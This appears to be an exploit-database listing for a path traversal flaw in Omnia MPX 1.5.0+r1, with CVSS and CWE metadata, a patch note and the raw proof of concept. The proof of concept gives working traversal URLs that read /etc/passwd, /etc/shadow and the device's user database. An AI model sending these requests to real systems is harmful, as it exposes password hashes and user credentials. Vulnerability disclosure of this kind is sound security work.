header-logo
Suggest Exploit
vendor:
Omnia MPX
by:
Momen Eldawakhly
8.8
CVSS
HIGH
Path Traversal
22
CWE
Product Name: Omnia MPX
Affected Version From: 1.5.0+r1
Affected Version To: 1.5.0+r1
Patch Exists: YES
Related CWE:
CPE: a:telos_alliance:omnia_mpx:1.5.0+r1
Metasploit:
Other Scripts:
Platforms Tested: MacOS
2022

Omnia MPX 1.5.0+r1 – Path Traversal

A path traversal vulnerability exists in Omnia MPX 1.5.0+r1 which allows an attacker to access sensitive files and user database. By sending a crafted HTTP request to the vulnerable server, an attacker can access the files and user database stored in the server.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update their systems to the latest version.
Source

Exploit-DB raw data:

# Exploit Title: Omnia MPX 1.5.0+r1 - Path Traversal
# Date: 24/7/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://www.telosalliance.com/
# Software Link: https://support.telosalliance.com/article/934ixoaz3l-mpx-node-release-notes-and-update-instructions
# Version: 1.5.0+r1
# Tested on: MacOS
# PoC:
http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..//etc/passwd
http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..//etc/shadow

User Database:
http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json

Navigation

Suggest Exploit

Services By CQR